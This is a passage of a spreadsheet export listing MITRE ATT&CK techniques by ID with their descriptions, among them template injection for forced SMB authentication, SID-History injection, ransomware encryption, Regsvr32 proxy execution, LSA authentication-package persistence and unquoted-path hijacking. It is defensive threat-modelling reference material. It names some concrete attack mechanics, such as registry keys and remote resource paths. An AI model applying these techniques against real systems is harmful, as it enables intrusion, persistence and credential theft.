* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to &lt;code&gt;file[:]//[remote address]/Normal.dotm&lt;/code&gt; to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as &lt;code&gt;\\[remote address]\pic.png&lt;/code&gt; that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)
https://attack.mitre.org/techniques/T1187</t>
  </si>
  <si>
    <t>T1134.005</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).
https://attack.mitre.org/techniques/T1134/005</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>Network Boundary Bridging</t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
https://attack.mitre.org/techniques/T1599</t>
  </si>
  <si>
    <t>T1486</t>
  </si>
  <si>
    <t>Data Encrypted for Impact</t>
  </si>
  <si>
    <t>Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)
In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) 
To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020)
In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)
https://attack.mitre.org/techniques/T1486</t>
  </si>
  <si>
    <t>T1553</t>
  </si>
  <si>
    <t>Subvert Trust Controls</t>
  </si>
  <si>
    <t>Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.
Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates)
https://attack.mitre.org/techniques/T1553</t>
  </si>
  <si>
    <t>T1548.004</t>
  </si>
  <si>
    <t>Elevated Execution with Prompt</t>
  </si>
  <si>
    <t>Adversaries may leverage the &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. 
Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.
Adversaries may abuse &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)
https://attack.mitre.org/techniques/T1548/004</t>
  </si>
  <si>
    <t>T1592.003</t>
  </si>
  <si>
    <t>Firmware</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).
https://attack.mitre.org/techniques/T1592/003</t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Encrypted Channel</t>
  </si>
  <si>
    <t>Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
https://attack.mitre.org/techniques/T1573</t>
  </si>
  <si>
    <t>T1547.002</t>
  </si>
  <si>
    <t>Authentication Package</t>
  </si>
  <si>
    <t>Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\&lt;/code&gt; with the key value of &lt;code&gt;"Authentication Packages"=&amp;lt;target binary&amp;gt;&lt;/code&gt;. The binary will then be executed by the system when the authentication packages are loaded.
https://attack.mitre.org/techniques/T1547/002</t>
  </si>
  <si>
    <t>T1218.010</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)
https://attack.mitre.org/techniques/T1218/010</t>
  </si>
  <si>
    <t>T1567.003</t>
  </si>
  <si>
    <t>Exfiltration to Text Storage Sites</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as &lt;code&gt;pastebin[.]com&lt;/code&gt;, are commonly used by developers to share code and other information.  
Text storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://attack.mitre.org/techniques/T1608)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)
**Note:** This is distinct from [Exfiltration to Code Repository](https://attack.mitre.org/techniques/T1567/001), which highlight access to code repositories via APIs.
https://attack.mitre.org/techniques/T1567/003</t>
  </si>
  <si>
    <t>T1592.002</t>
  </si>
  <si>
    <t>Software</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1592/002</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).
https://attack.mitre.org/techniques/T1056</t>
  </si>
  <si>
    <t>T1566.004</t>
  </si>
  <si>
    <t>Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
All forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Software](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)
Adversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing)
https://attack.mitre.org/techniques/T1566/004</t>
  </si>
  <si>
    <t>T1587.004</t>
  </si>
  <si>
    <t>Exploits</t>
  </si>
  <si>
    <t>Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.
Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).
https://attack.mitre.org/techniques/T1587/004</t>
  </si>
  <si>
    <t>T1593.001</t>
  </si>
  <si>
    <t>Social Media</t>
  </si>
  <si>
    <t>Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).
https://attack.mitre.org/techniques/T1593/001</t>
  </si>
  <si>
    <t>T1213.004</t>
  </si>
  <si>
    <t>Customer Relationship Management Software</t>
  </si>
  <si>
    <t>Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
https://attack.mitre.org/techniques/T1213/004</t>
  </si>
  <si>
    <t>T1546.015</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry. 
Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.
https://attack.mitre.org/techniques/T1546/015</t>
  </si>
  <si>
    <t>T1589.001</t>
  </si>
  <si>
    <t>Credentials</t>
  </si>
  <si>
    <t>Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.
Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)
Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.). Adversaries may purchase credentials from dark web markets, such as Russian Market and 2easy, or through access to Telegram channels that distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer Stealer Logs 2023)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
https://attack.mitre.org/techniques/T1589/001</t>
  </si>
  <si>
    <t>T1195.002</t>
  </si>
  <si>
    <t>Compromise Software Supply Chain</t>
  </si>
  <si>
    <t>Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011)
https://attack.mitre.org/techniques/T1195/002</t>
  </si>
  <si>
    <t>T1036.003</t>
  </si>
  <si>
    <t>Rename System Utilities</t>
  </si>
  <si>
    <t>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename &lt;code&gt;rundll32.exe&lt;/code&gt;). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
https://attack.mitre.org/techniques/T1036/003</t>
  </si>
  <si>
    <t>T1102.002</t>
  </si>
  <si>
    <t>Bidirectional Communication</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. 
Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
https://attack.mitre.org/techniques/T1102/002</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Several types exist:
### Browser-based Exploitation
Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
### Office Applications
Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
https://attack.mitre.org/techniques/T1203</t>
  </si>
  <si>
    <t>T1595.003</t>
  </si>
  <si>
    <t>Wordlist Scanning</t>
  </si>
  <si>
    <t>Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://attack.mitre.org/techniques/T1110), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591), or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).
For example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories.(Citation: ClearSky Lebanese Cedar Jan 2021) This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [Brute Force](https://attack.mitre.org/techniques/T1110)).  
As cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.(Citation: S3Recon GitHub)(Citation: GCPBucketBrute) Once storage objects are discovered, adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530) to access valuable information that can be exfiltrated or used to escalate privileges and move laterally.
https://attack.mitre.org/techniques/T1595/003</t>
  </si>
  <si>
    <t>T1562.011</t>
  </si>
  <si>
    <t>Spoof Security Alerting</t>
  </si>
  <si>
    <t>Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
Rather than or in addition to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.
For example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.(Citation: BlackBasta)
https://attack.mitre.org/techniques/T1562/011</t>
  </si>
  <si>
    <t>T1137.004</t>
  </si>
  <si>
    <t>Outlook Home Page</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)
https://attack.mitre.org/techniques/T1137/004</t>
  </si>
  <si>
    <t>T1573.002</t>
  </si>
  <si>
    <t>Asymmetric Cryptography</t>
  </si>
  <si>
    <t>Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.
For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).
https://attack.mitre.org/techniques/T1573/002</t>
  </si>
  <si>
    <t>T1567.002</t>
  </si>
  <si>
    <t>Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.
https://attack.mitre.org/techniques/T1567/002</t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>Lateral Tool Transfer</t>
  </si>
  <si>
    <t>Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.
Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019)
Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095). In some cases, adversaries may be able to leverage [Web Service](https://attack.mitre.org/techniques/T1102)s such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.(Citation: Dropbox Malware Sync)
https://attack.mitre.org/techniques/T1570</t>
  </si>
  <si>
    <t>T1574.009</t>
  </si>
  <si>
    <t>Path Interception by Unquoted Path</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., &lt;code&gt;C:\unsafe path with space\program.exe&lt;/code&gt; vs. &lt;code&gt;"C:\safe path with space\program.exe"&lt;/code&gt;). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is &lt;code&gt;C:\program files\myapp.exe&lt;/code&gt;, an adversary may create a program at &lt;code&gt;C:\program.exe&lt;/code&gt; that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
https://attack.mitre.org/techniques/T1574/009</t>
  </si>
  <si>
    <t>T1608.003</t>
  </si>
  <si>
    <t>Install Digital Certificate</t>
  </si>
  <si>
